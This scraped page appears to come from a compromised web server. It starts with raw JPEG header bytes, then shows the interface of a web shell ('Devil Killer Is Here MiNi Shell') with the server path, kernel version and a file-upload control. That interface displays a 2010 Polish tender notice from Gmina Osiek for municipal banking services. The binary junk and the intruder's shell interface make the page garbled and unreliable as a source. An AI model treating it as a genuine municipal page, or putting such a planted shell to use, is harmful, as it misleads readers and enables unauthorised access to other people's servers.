JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101014/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101014/287531-N-2010.html

<p class="kh_header"><b>Osiek: Obsługa bankowa budżetu Gminy 0siek wraz z jednostkami organizacyjnymi
w latach 2010 - 2014</b><br>
<b>Numer ogłoszenia: 287531 - 2010; data zamieszczenia: 14.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Osiek , ul. Rynek 1, 28-221 Osiek, woj. świętokrzyskie, tel. 015 8671203, faks 015 8671232.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.osiek.iap,pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Obsługa bankowa budżetu Gminy 0siek wraz z jednostkami organizacyjnymi
w latach 2010 - 2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest

0bsługa bankowa budżetu Gminy 0siek  wraz
z jednostkami organizacyjnymi w latach 2010 - 2014

obejmująca swym zasięgiem następujące jednostki organizacyjne:

- Zespół Szkół im. Jana Pawła II w 0sieku ;

- Ośrodek Pomocy Społecznej w 0sieku  (OPS),

-Urząd  Miasta i Gminy w 0sieku ;
-Publiczna Szkoła Podstawowa w Bukowej;
-Publiczna Szkoła Podstawowa w Długołęce,.
-Publiczna Szkoła Podstawowa im. Marii Konopnickiej w Suchowoli;
-Publiczna Szkoła Podstawowa im. Heleny i Józefa Światyńskich w 0ssali;
-Publiczna Szkoła Podstawowa w Szwagrowie;
-Publiczna Szkoła Podstawowa w Pliskowoli;
-Miejsko-Gminny 0środek Kultury w 0sieku;
-Miejsko-Gminna Biblioteka Publiczna  w 0sieku ;
-Zakład Gospodarki Komunalnej w 0sieku .

Zamawiający   zastrzega, że liczba jednostek   organizacyjnych może	 się zmienić	w trakcie obowiązywania umowy.
Umowy na obsługę bankową w zakresie wymienionych usług bankowych zawierać będą:

                       -ze strony Gminy  0siek  - Burmistrz Miasta i Gminy przy kontrasygnacie 
                      Skarbnika Miasta i Gminy;

                      - ze strony wymienionych jednostek organizacyjnych - kierownicy jednostek organizacyjnych.

1. Obsługa bankowa obejmować będzie (uwzględniając potrzeby wszystkich jednostek):

1.1 Otwarcie i prowadzenie rachunków podstawowych  -14 szt., w tym:

-Urząd Miasta i Gminy w 0sieku - 3 szt;

- 0środek Pomocy Społecznej w 0sieku  - 1 szt;

- Zakład Gospodarki Komunalnej w 0sieku  - 1 szt;

          -Miejsko-Gminny 0środek Kultury w 0sieku - 1 szt;
  -Miejsko-Gminna Biblioteka Publiczna w 0sieku - 1 szt;
                     -Publiczna Szkoła Podstawowa w Bukowej - 1 szt.
                     -Publiczna Szkoła Podstawowa w Długołęce- 1 szt;
                      -Publiczna Szkoła Podstawowa im. Marii Konopnickiej w Suchowoli- 1 szt.
                        -Publiczna Szkoła Podstawowa im.Heleny i Józefa Świątyńskich 
                        w 0ssali- 1 szt.
                        -Publiczna Szkoła Podstawowa w Szwagrowie - 1 szt;
                        -Publiczna Szkoła Podstawowa w Pliskowoli- 1 szt.
                        - Zespół Szkół im. Jana Pawła II w 0sieku - 1 szt  ;

1.2 Otwarcie i prowadzenie rachunków pomocniczych - 26 szt., w tym:

-Urząd Miasta i Gminy w 0sieku - 5 szt;

- Ośrodek  Pomocy społecznej w 0sieku  - 4 szt;
                       -Publiczna Szkoła Podstawowa w Bukowej- 2 szt;
           -Publiczna Szkoła Podstawowa w Długołęce- 2 szt;
           -Publiczna Szkoła Podstawowa im. Marii Konopnickiej w Suchowoli- 2 szt;
           -Publiczna Szkoła Podstawowa im.Heleny i Józefa Światyńskich w 0ssali- 2 szt ;
           -Publiczna Szkoła Podstawowa w Szwagrowie - 2 szt ;
           -Publiczna Szkoła Podstawowa w Pliskowoli- 2 szt;
          - Zespół Szkół im. Jana Pawła II w 0sieku - 3 szt;
                  -Miejsko-Gminny 0środek Kultury w 0sieku - 1 szt;
                        -Zakład Gospodarki Komunalnej w 0sieku - 1 szt.
 
2. Bezpłatne przyjmowanie wpłat gotówkowych na rzecz wszystkich jednostek organizacyjnych:

 Za  wpłaty  własne  uważa  się  wpłaty  dokonywane  we  własnej  placówce  banku  (oddziale,  filii),  pod nazwą  Zamawiającego i jego jednostek organizacyjnych   oraz   wpłaty   inkasentów   podatków   i   opłat   Zamawiającego,   a   także   wpłaty od interesantów.
3. Bezpłatne dokonywanie wypłat gotówkowych przez wszystkie jednostki organizacyjne: Dokonywanie wypłat gotówkowych  na podstawie wystawionych dowodów wypłat.
4. Realizacja poleceń przelewów na rachunki w banku obsługującym i rachunki w innych bankach:

4.1  Planowana liczba przelewów elektronicznych  w skali roku - ok. 14.933 .szt., w tym:

- Zespół Szkół im. Jana Pawła II w 0sieku-2.828 szt  ;

- Ośrodek Pomocy Społecznej w 0sieku  (OPS) - 3.240 szt ;

-Urząd  Miasta i Gminy w 0sieku -3.732 szt ;;
-Publiczna Szkoła Podstawowa w Bukowej-444 szt
-Publiczna Szkoła Podstawowa w Długołęce,-420 szt
-Publiczna Szkoła Podstawowa im. Marii Konopnickiej w Suchowoli-576 szt.
-Publiczna Szkoła Podstawowa im.Heleny i Józefa Światyńskich w 0ssali-630 szt
-Publiczna Szkoła Podstawowa w Szwagrowie -648 szt
-Publiczna Szkoła Podstawowa w Pliskowoli-735 szt
-Miejsko-Gminny 0środek Kultury w 0sieku- 720
-Miejsko-Gminna Biblioteka Publiczna  w 0sieku -240  szt
-Zakład Gospodarki Komunalnej w 0sieku -720 

4.2  Planowana liczba przelewów papierowych  w skali roku - ok. 131 szt., w tym:

Zespół Szkół im. Jana Pawła II w 0sieku -20 zt

- Ośrodek Pomocy Społecznej w 0sieku  (OPS)-20 szt

-Urząd  Miasta i Gminy w 0sieku - 50 szt
-Publiczna Szkoła Podstawowa w Bukowej-4 szt
-Publiczna Szkoła Podstawowa w Długołęce,- 4 szt
-Publiczna Szkoła Podstawowa im. Marii Konopnickiej w Suchowoli-5 szt
-Publiczna Szkoła Podstawowa im.Heleny i Józefa Światyńskich w 0ssali-5 szt
-Publiczna Szkoła Podstawowa w Szwagrowie  -5 szt
-Publiczna Szkoła Podstawowa w Pliskowoli- 5 szt
-Miejsko-Gminny 0środek Kultury w 0sieku- 5 szt 
-Miejsko-Gminna Biblioteka Publiczna  w 0sieku - 3 szt 
-Zakład Gospodarki Komunalnej w 0sieku -5 
4.3 Realizacja przelewów wewnętrznych między rachunkami budżetu Gminy 0siek  i jednostek podległych -bezpłatna.

5. Wykonawca ubiegający się o zamówienie zapewni:

5.1 Objęcie systemem bankowości elektronicznej wszystkie obsługiwane jednostki.

 System ma obejmować dostawę i instalację urządzeń niezbędnych do  obsługi systemu, szkolenie pracowników oraz zapewnienie prawidłowej pracy zainstalowanego systemu. Bank udostępni usługi typu  home  banking  na  co  najmniej  5  stanowiskach w  Urzędzie Miasta i Gminy   w 0sieku  ,w Zakładzie Gospodarki Komunalnej -1 , instytucje kultury - 1, szkoły - 2 i 0srodek Pomocy Społecznej - 2 . Zamawiający zastrzega sobie prawo zmian w ilości tworzonych stanowisk do usługi bankowości elektronicznej. Usługa typu bankowość elektroniczna winna być zainstalowana w terminie 7 dni od dnia podpisania umowy. Bank zapewni bezpłatną pomoc techniczną w okresie wdrożeniowym i powdrożeniowym pracownikom Urzędu Miasta i Gminy i jednostek organizacyjnych pracujących w systemie bankowości elektronicznej.
 System bankowości elektronicznej powinien umożliwić Zamawiającemu w szczególności:

- uzyskanie w czasie rzeczywistym informacji o wszystkich operacjach i saldach na wszystkich rachunkach,
- przeszukiwanie zbioru wszystkich operacji wg rodzaju operacji, nazwy kontrahenta, rachunku kontrahenta, daty, okresu, kwoty i innych kryteriów możliwych do wyodrębnienia w zbiorze operacji,
- składania poleceń przelewu ze wszystkich rachunków,

- składania poleceń przelewu na lokaty terminowe,

- monitorowanie operacji i sporządzanie z wybranego okresu obsługi szczegółowych wyciągów dla wszystkich operacji,
- import danych z programów księgowo -płacowych Miasta i Gminy  do systemu bankowości elektronicznej.
 System bankowości elektronicznej będzie umożliwiał równoczesną pracę kilku użytkowników, przy czym każdy użytkownik winien posiadać swój indywidualny identyfikator i hasło dostępu do systemu.
5.2 Zagospodarowanie i lokowanie wolnych środków finansowych na lokatach krótkoterminowych i  długoterminowych  (lokaty  jednodniowe,  weekendowe,  tygodniowe,  miesięczne  i  inne  dostępne w ofercie Banku).
5.3  Bank   będzie   dokonywał   miesięcznej   kapitalizacji   odsetek   od   środków   zgromadzonych na rachunkach bankowych Zamawiającego.
5.4 Wykonawca  udzieli Gminie  0siek   na  jej  wniosek  kredytu  (bez  wymogu  innych zabezpieczeń poza wekslem) w rachunku bieżącym o zmiennym oprocentowaniu na pokrycie występującego w trakcie roku deficytu budżetu. Wysokość kredytu będzie określana w każdym roku budżetowym przez Radę Miejską w 0sieku. Uruchomienie kredytu w rachunku bieżącym nastąpi w terminie 7 dni od daty dostarczenia wniosku o uruchomienie kredytu. Bank nie będzie pobierał  prowizji  za udzielenie kredytu  krótkoterminowego  oraz  innych  opłat  związanych  z  jego uruchomieniem.  Oprocentowanie o  stawkę  %  WIBOR  dla 1  miesięcznych  złotowych  depozytów międzybankowych. Stopa procentowa ustalana będzie na miesięczne okresy obowiązywania oprocentowania.
5.5Wydawanie opinii bankowych i zaświadczeń bez pobierania opłat.

5.6 Zamawiający zastrzega sobie prawo otwarcia dodatkowych oprocentowanych rachunków bankowych Gminy 0siek  lub jednostek podległych, które mogą powstać w okresie obowiązywania umowy, na warunkach określonych w ofercie Banku wybranego w niniejszym postępowaniu przetargowym.
5.7 Zastosowanie taryf opłat i prowizji bankowych w odrębnych umowach rachunku bankowego dla jednostek Gminy według taryf podanych w ofercie banku na obsługę budżetu Miasta i Gminy 0siek.
6. Wymagania dotyczące realizacji przedmiotu zamówienia:

 Przy wykonywaniu czynności związanych z obsługą bankową Zamawiający wymaga od Wykonawcy, aby:
6.1 Wszystkie rachunki Gminy 0siek oraz jej jednostek organizacyjnych były obsługiwane na tych samych warunkach.
6.2 Nie pobierał opłat za:

- realizację przelewów przychodzących,

- dokonywanie otwartych wpłat własnych na rachunki Zamawiającego przez upoważnionych pracowników Zamawiającego oraz inkasentów podatków, opłat, a także od upoważnionych pracowników jednostek organizacyjnych dokonujących wpłat w imieniu jednostki,
-  dokonywanie  wpłat  z  tytułu  podatków  lub  innych  opłat  przez  interesantów   Gminy 0siek   oraz jednostek organizacyjnych,

- dokonywanie wypłat gotówkowych na podstawie zleceń wypłat ;
-  przelewy papierowe  w  przypadku  przerw  technicznych  i  awarii  systemu,  przejściowej  blokady użytkownika.  Zamawiający  oczekuje  od  Banku  obsługi  elektronicznych  przelewów,  a  forma papierowa   będzie   mogła   mieć   zastosowanie   sporadycznie,   w   szczególności   w   przypadkach wskazanych w zdaniu poprzednim,
- otwarcie i zamykanie rachunków bankowych,
6.3 Ze względu na charakter zamówienia Wykonawca zobowiązany będzie do świadczenia usługi obsługi bankowej budżetu  Gminy 0siek przez własną placówkę (oddział filię) mającą siedzibę na terenie m. 0sieka .
6.4 Zapewnił realizację czynności bankowych objętych zamówieniem, co najmniej w zakresie kompleksowej obsługi wpłat i wypłat gotówkowych oraz przyjęcia do realizacji polecenia przelewu w  sytuacjach  awaryjnych  określonych  powyżej  w  pkt  6.2.  w  oddziale,  placówce  znajdującej  się na terenie miasta 0siek.
6.5 Dołożył wszelkiej staranności w zakresie bezpieczeństwa przechowywania środków pieniężnych  Zamawiającego.
6.6 Wykonywał obsługę bankową Zamawiającego samodzielnie, tj. Zamawiający zastrzega, że całość przedmiotu zamówienia nie może być powierzona podwykonawcom.

6.7  Zamawiający  zastrzega  sobie  swobodę  lokowania  wolnych  środków  pieniężnych  w  innych bankach, zgodnie z art. 264 ust. 1 pkt 3 ustawy z dnia 27 sierpnia 2009 roku o finansach publicznych (Dz. U. Nr 157, poz. 1240, z późn. zm.).
6.8 Wykonawca udzieli osobom upoważnionym przez Zamawiającego, a także skarbnikowi informacji telefonicznych o stanie na rachunkach i wszystkich operacjach poprzedniego dnia do czasu wdrożenia przez jednostkę systemu elektronicznego lub w przypadku utrudnień technicznych w systemie wdrożeniowym.
6.9  Zamawiający  wymaga  od  Wykonawcy  zagwarantowania  niezmienności  warunków  umowy na niekorzyść Zamawiającego w stosunku do złożonej oferty (np. wysokość opłat, prowizji, stałych współczynników odnoszących się do  oprocentowania środków na rachunkach bieżących i innych warunków   umowy,   dokonywanie   niekorzystnych   dla   Zamawiającego   zmian   wynikających np. ze wzrostu kosztów własnych banku i innych przyczyn zależnych od niego). Zamawiający zastrzega, iż w czasie zmieniającej się sytuacji ekonomicznej banku działającego w warunkach wolnorynkowych,   wartości   w   tabeli   opłat,   prowizji,   oprocentowania   rachunków   bankowych mogą ulegać zmianie. Jednak zmiany opłat i prowizji nie mogą przewyższać stawek opłat i prowizji zaproponowanych w ofercie przetargowej. Niedopuszczalne jest wprowadzanie niekorzystnych zmian wyłącznie na podstawie powiadomień o decyzji zarządu Wykonawcy lub innego organu Wykonawcy. W przypadku wzrostu stopy oprocentowania rachunków lub lokat w banku, Wykonawca uwzględni zmiany zmieniając tym samym warunki umowy na korzyść Zamawiającego, sporządzając w tym celu aneks do umowy.
6.10 Dla innych ewentualnych czynności, nieprzewidzianych w SIWZ, będących przedmiotem doraźnego  zlecenia  Zamawiającego,  Wykonawca będzie stosował  opłaty i  prowizje w  wysokości nie  wyższej  niż  określone  w  obowiązującej  w  banku  oficjalnej  tabeli,  stanowiącej  załącznik  do umowy. Z tytułu wykonywania czynności obsługi bankowej opisanych w przedmiocie zamówienia,
Bank nie będzie pobierał żadnych  innych opłat i prowizji niż te, które zostały określone w ofercie  Wykonawcy.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt  6 ustawy Prawo zamówień publicznych, w wysokości 30 % wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 66.11.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem udziału w postępowaniu przetargowym jest wniesienie wadium w wysokości 10.000 zł ( słownie: dziesięć tysięcy złotych). Wadium wnosi się przed upływem terminu składania ofert tj. do dnia 25.X. 2010 r. do godz.14 .Wadium może być wnoszone we wszystkich formach określonych w art.45 PZP .
Jeżeli wadium będzie wnoszone w formie gwarancji bankowej /ubezpieczeniowej to w treści gwarancji winny znaleźć się następujące elementy:
1)	zobowiązanie banku/towarzystwa ubezpieczeniowego do zapłaty sumy wadium w przypadku . gdy zajdą ku temu okoliczności , określone w przepisie art.46 ust.4a i ust.5 PZP;
2)	dokładną nazwę postępowania stanowiącego przyczynę wystawienia gwarancji;
3)	wskazanie sumy gwarancyjnej;
4)	wskazanie Zamawiającego , czyli beneficjenta gwarancji/ubezpieczonego;
5)	wskazanie Wykonawcy, czyli zleceniodawcy gwarancji/ubezpieczyciela;
6)	określenie okresu ważności gwaranci tj. wskazanie terminu , w którym zobowiązanie powstaje oraz wygasa , przy czym gwarancja o charakterze terminowym nie może zostać odwołana.
Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy zamawiającego : Nadwiślański Bank Spółdzielczy Solec Zdrój 0/0siek nr 34 8517 0007 0070 0000 0303 0006 .
Wadia ( oryginały ) w formach  niepieniężnych należy zdeponować u zamawiającego w dni robocze od godz. 8- 15 .Do oferty należy dołączyć dowód wniesienia wadium ( kserokopię - poświadczoną za zgodność z oryginałem.) .W przypadku wadium wniesionego w formie gwarancji , z treści tej wynikać winno bezwarunkowo , że na każde pisemne żądanie zgłoszone przez zamawiającego , w terminie związania ofertą , gwarant zobowiązuje się do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art.46 ust.5 ustawy PZP . Za zachowanie terminu do wniesienia wadium w przypadku przelewu lub przekazu uważa się uznanie rachunku bankowego zamawiającego do dnia 25.X.2010 r. do godz.14 .Zwrot oraz zatrzymanie wadium następuje na zasadach określonych a art.46 ustawy PZP. Wadium musi być zabezpieczone na okres 60 dni , licząc od daty składania ofert - termin związany ofertą.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zezwolenie  uprawniające  do  wykonywania  czynności  bankowych   wydane na podstawie przepisów ustawy Prawo bankowe, (załącznik nr 2 do wzoru oferty).
2. W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o  których  mowa w  art. 24  ust. 1 ustawy pzp, do oferty należy załączyć:</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków  udziału  w  postępowaniu na   wiedzę   i   doświadczenie,   potencjał   techniczny,   osoby  zdolne   do   wykonania   zamówienia lub zdolność finansową innych podmiotów, (niezależnie od charakteru prawnego łączących go z nimi stosunków) zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie  tych  podmiotów  do  oddania  mu  do  dyspozycji  niezbędnych  zasobów  na  okres korzystania z nich przy wykonywaniu zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. W celu potwierdzenia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy pzp, wraz z formularzem oferty należy załączyć:
1.1 dokument 1. Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy pzp (załącznik nr 1 do wzoru oferty).
2. W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o  których  mowa w  art. 24  ust. 1 ustawy pzp, do oferty należy załączyć:
2.1 dokument 3. Oświadczenie o braku podstaw do wykluczenia z postępowania z powodu , o których mowa w art. 24 ust. 1 ustawy pzp (załącznik nr 3 do SIWZ).
3. Ponadto do oferty należy załączyć następujące dokumenty:

3.1 dokument 4. Wzór  umowy  sporządzonej  przez Wykonawcę, zawierające istotne postanowienia do umowy, stanowiący  załącznik nr 2 do SIWZ, zgodne z zakresami zawartymi w SIWZ (załącznik nr 4 do wzoru oferty).
5. Jeżeli Wykonawca ma swoją siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, Zamawiający składa dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Dokument ten powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
6. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania,  nie wydaje się dokumentu  którym  mowa w  rozdziale XII pkt  5,  zastępuje się  go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio do miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
7. Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli wymaganych przez Zamawiającego oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1, lub którzy nie złożyli pełnomocnictw,  albo  którzy  złożyli li  wymagane  przez  Zamawiającego  oświadczenia  i  dokumenty, o których mowa w art. 25 ust. 1, zawierające błędy, lub którzy złożyli wadliwe pełnomocnictwa, do ich  złożenia w  wyznaczonym  terminie,  chyba  że  mimo  ich  złożenia oferta Wykonawcy podlega odrzuceniu,  albo  konieczne  byłoby  unieważnienie  postępowania.  Złożone  na  wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnienie przez Wykonawcę, na dzień składania ofert, warunków udziału w postępowaniu oraz spełnianie przez oferowane usługi wymagań określonych przez Zamawiającego. Dokumenty, o których mowa powyżej powinny być składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. Wszystkie przedkładane dokumenty muszą być aktualne, tzn. powinny odzwierciedlać rzeczywisty, nadal utrzymujący się stan faktyczny i prawny.
Każdy  z  Wykonawców  występujących  wspólnie  składa  odrębne  oświadczenie  o  braku  podstaw do wykluczenia z postępowania o udzielenie zamówienia publicznego.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
